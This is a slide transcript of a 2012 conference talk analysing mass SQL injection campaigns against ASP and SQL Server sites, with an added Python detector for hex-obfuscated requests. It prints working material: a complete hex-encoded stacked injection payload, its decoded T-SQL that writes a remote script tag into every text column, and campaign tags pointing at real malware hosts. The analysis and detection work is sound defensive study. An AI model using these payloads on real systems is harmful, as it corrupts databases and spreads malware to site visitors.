Analysis of mass SQL injection attacks

These are the slides from a talk "Analysis of mass SQL injection attacks" held at FSec 2012 conference (Croatia / Varazdin 21st September 2012) by Miroslav Stampar

  1. Analysis of mass SQL injection attacks
     Miroslav Štampar (dev@sqlmap.org)
  2. FUD (Fear, Uncertainty, Doubt)
     • “A new virus is making the rounds and is wreaking havoc on the Internet”
     • “Whatever language is used to write to the database, all SQL databases use the same basic formulas for writing and retrieving data”
     • “Targets that bottleneck in the technology, making it platform-independent… Whether the machine is using ASP, ColdFusion, JSP, PHP, or whatever else”
     • “...blazing through the internet, infecting more than half a million domains around the world to date and as many as 1.5 million URLs”
     (FSec – FOI 2012, Varaždin (Croatia), September 21st, 2012)
  3. Google is (not) your friend (1)
  4. Google is (not) your friend (2)
  5. Google is (not) your friend (3)
  6. What's it all about?
     • Platform dependent (IIS / ASP(.NET))
     • DBMS dependent (Microsoft SQL Server)
     • Highly automated (tool-based) approach
     • Popular SQL enumeration tools with or without Google search capability don't count (e.g. sqlmap, Havij, Pangolin)
     • Infection(s) counting in thousands of domains (not millions as previously believed)
     • As dumb as it can be (usually one request per target)
     • In short: malware distribution
  7. Modus operandi
     • Get hold of a couple of 1-day exploits
     • Blindly inject a SQL payload carrying malicious content (<script>, <iframe>, etc.) into the content tables of as many vulnerable web servers as possible
     • Leverage the exploit(s) and/or the users' lack of technical knowledge to install malware (spyware, trojans, etc.) on visitors' computers
     • Profit(???) (DEFCON 18 – Garry Pejski: “My Life As A Spyware Developer”)
  8. Sample leveraged exploits
     • CVE-2012-4681 Oracle Java 7 Update 6
     • CVE-2012-1889 Microsoft XML Core Services
     • CVE-2012-1723 Java Runtime Environment
     • CVE-2012-0507 Java Runtime Environment
     • CVE-2011-3544 Java Runtime Environment
     • CVE-2011-2110 Adobe Flash Player
     • CVE-2011-0611 Adobe Flash Player
     • CVE-2010-3552 New Java Plug-in
     • CVE-2010-0188 Adobe Reader
     • etc.
  9. Notable members (1)
     • Lilupophilupop (sl.php)
       "></title><script src="http://lilupophilupop.com/sl.php"></script><!--
     • Nikjju (r.php)
       <script src=http://nikjju.com/r.php></script>
     • Robint (u.js)
       <script src=http://ww.robint.us/u.js></script>
     • LizaMoon (ur.php)
       </title><script src=http://lizamoon.com/ur.php></script>
     • Jjghui (urchin.js)
       </title><script src=http://jjghui.com/urchin.js></script>
  10. Notable members (2)
  11. Notable members (3)
  12. Generic payload (obfuscated)

      GET /vuln.asp?param=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220............................................................5845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);--

  13. Generic payload (decoded)

      The script host below is a placeholder; in the hex on the previous slide the appended tag is <script src=http://www.chkadw.com/b.js></script>. Quotes that were lost in the slide export are restored, and the CONVERT length (4000) is the one actually present in the hex.

      DECLARE @t VARCHAR(255), @c VARCHAR(255)
      DECLARE table_cursor CURSOR FOR
        SELECT a.name, b.name FROM sysobjects a, syscolumns b
        WHERE a.id=b.id AND a.xtype='u'
          AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) /* NTEXT, TEXT, NVARCHAR, VARCHAR */
      OPEN table_cursor
      FETCH NEXT FROM table_cursor INTO @t, @c
      WHILE (@@FETCH_STATUS=0)
      BEGIN
        -- dynamic SQL: append the tag to every row of the current text-like column
        EXEC('UPDATE ['+@t+'] SET ['+@c+']=RTRIM(CONVERT(VARCHAR(4000),['+@c+']))+''<script src=http://www.attacker.com/malicious.js></script>''')
        FETCH NEXT FROM table_cursor INTO @t, @c
      END
      CLOSE table_cursor
      DEALLOCATE table_cursor

  14. Analysis (1)
      • Piggy-backing (stacked) SQL injection
      • Obfuscated SQL code (hex encoded)
      • Decoded code dynamically executed with the T-SQL EXEC command
      • Usage of a cursor for the update
      • Iterating over all tables / all text-like columns
      • Appending malicious content (e.g. <script src=...) to all matched column entries using an UPDATE statement
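The request shape on slides 12 to 14 is regular enough to be pulled apart mechanically. What follows is an added example, not code from the talk or from sqlmap: it hex-encodes a payload of the same shape as the decoded generic payload, embeds it in constructed IIS-style log lines, and then detects and decodes such requests, reporting whether the payload is stacked, whether it walks syscolumns with a cursor, and which script URL it plants. The host malware.example, the IP addresses and the log lines are constructed for the demo; the NVARCHAR branch (UTF-16LE payloads) is an assumption about a variant the slides do not show.

```python
"""Decoder / detector for hex-obfuscated mass SQL injection requests of the
DECLARE @S ...;SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S) shape.
Added example, not code from the talk. Hosts, IPs and log lines are constructed."""
import re
from typing import Optional
from urllib.parse import unquote_plus

# The real T-SQL travels as a hex literal inside CAST(0x... AS VARCHAR(n)) / NVARCHAR(n).
HEX_CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)", re.IGNORECASE)
# The tag the decoded SQL appends to every text-like column.
SCRIPT_SRC_RE = re.compile(r"<script\s+src=[\"']?([^\"'>\s]+)", re.IGNORECASE)


def hex_encode(sql: str) -> str:
    """Obfuscate T-SQL the way the attack tools do: ASCII bytes as one 0x literal."""
    return "0x" + sql.encode("latin-1").hex().upper()


def decode_hex_payload(hexdigits: str, nvarchar: bool = False) -> str:
    """Reverse the CAST(0x...) obfuscation. An odd-length literal (log entry clipped
    mid-byte) is cut back to the last whole byte so it still decodes."""
    if len(hexdigits) % 2:
        hexdigits = hexdigits[:-1]
    raw = bytes.fromhex(hexdigits)
    return raw.decode("utf-16-le" if nvarchar else "latin-1", errors="replace")


def analyse_request(uri_query: str) -> Optional[dict]:
    """Describe what a hex-cast SQLi query string does, or return None for a clean one."""
    query = unquote_plus(uri_query)  # logs keep the request URL-encoded (+, %3B, ...)
    m = HEX_CAST_RE.search(query)
    if not m:
        return None
    sql = decode_hex_payload(m.group(1), nvarchar=m.group(2).upper() == "NVARCHAR")
    tag = SCRIPT_SRC_RE.search(sql)
    flags = re.IGNORECASE | re.DOTALL
    return {
        "stacked": ";" in query[: m.start()],  # ';DECLARE ...' piggy-backed on the real query
        "cursor_over_syscolumns": bool(re.search(r"\bCURSOR\b.*\bsyscolumns\b", sql, flags)),
        "updates_text_columns": bool(re.search(r"\bUPDATE\b.*\bRTRIM\(CONVERT\(", sql, flags)),
        "script_src": tag.group(1) if tag else None,
        "sql": sql,
    }


def scan_iis_log(lines) -> list:
    """Run analyse_request over IIS W3C lines (fields: date time s-ip cs-method
    cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status)."""
    hits = []
    for line in lines:
        fields = line.split(" ")
        if len(fields) < 9 or fields[3] not in ("GET", "POST"):
            continue
        result = analyse_request(fields[5])
        if result:
            hits.append({"client": fields[8], "stem": fields[4], **result})
    return hits


# Constructed payload of the same shape as the decoded generic payload on slide 13.
PAYLOAD_SQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) "
    "DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b "
    "WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN "
    "EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))"
    "+''<script src=http://malware.example/b.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)

# Constructed IIS W3C log lines: one ordinary request, one mass-SQLi request, one
# request that merely contains a hex-looking value.
SAMPLE_LOG = [
    "2012-09-21 10:15:01 10.0.0.5 GET /news.asp id=7 80 - 198.51.100.9 Mozilla/5.0 200",
    "2012-09-21 10:15:02 10.0.0.5 GET /vuln.asp param=1;DECLARE+@S+VARCHAR(4000);SET+@S=CAST("
    + hex_encode(PAYLOAD_SQL) + "+AS+VARCHAR(4000));EXEC(@S);-- 80 - 203.0.113.7 Mozilla/4.0 200",
    "2012-09-21 10:15:03 10.0.0.5 GET /item.asp color=0xFF00AA 80 - 198.51.100.9 Mozilla/5.0 200",
]

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(f"{hit['client']} -> {hit['stem']}: stacked={hit['stacked']}, "
              f"cursor={hit['cursor_over_syscolumns']}, injects {hit['script_src']}")
```

Matching on the CAST(0x... AS VARCHAR) wrapper rather than on a fixed hex string is deliberate: the campaigns on slide 9 differ only in the planted tag, so the hex changes while the wrapper and the cursor-over-syscolumns structure do not. Decoding the literal before matching is what makes a single rule cover all of them.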
  15. Analysis (2)
  16. Analysis (3)
  17. Example (1) - FAIL
  18. Example (2) - FAIL
  19. Example (3) - FAIL
  20. Example (4) – CLUSTER FAIL
  21. Example (5) - SUCCESS
  22. Example (6) - SUCCESS
  23. Asprox (1)
      • Spam botnet used for phishing scams (>10K bots)
      • Developed over years
      • Interesting update: “msscntr32.exe” (SQL attack tool)
      • Google search for targets (e.g. inurl:".asp")
      • Launch SQL injection attacks against the resulting pages
  24. Asprox (2)
  25. CLI (1)
      • Standalone executable
      • Rare beast (Chinese underground forums?)
      • Google search for targets (e.g.: inurl:".asp" inurl:"a=")
      • Configurable malicious tag that will be inserted (originally <script src=http://www.2117966.net/fuckjp.js></script>)
      • Wild guess is that attackers are being paid for using the tool (callback to *.cn/pay.asp?SN=...)
  26. CLI (2)
  27. Sample tool (1)
  28. Sample tool (2)
  29. Sample tool (3)
  30. Sample tool (4)
  31. Sample tool (5)
  32. Sample run (1)
  33. Sample run (2)
  34. Sample run (3)
  35. Sample run (4)
  36. Sample run (5)
  37. Sample run (6)
  38. Sample run (7)
  39. Sample run (8)
  40. Questions?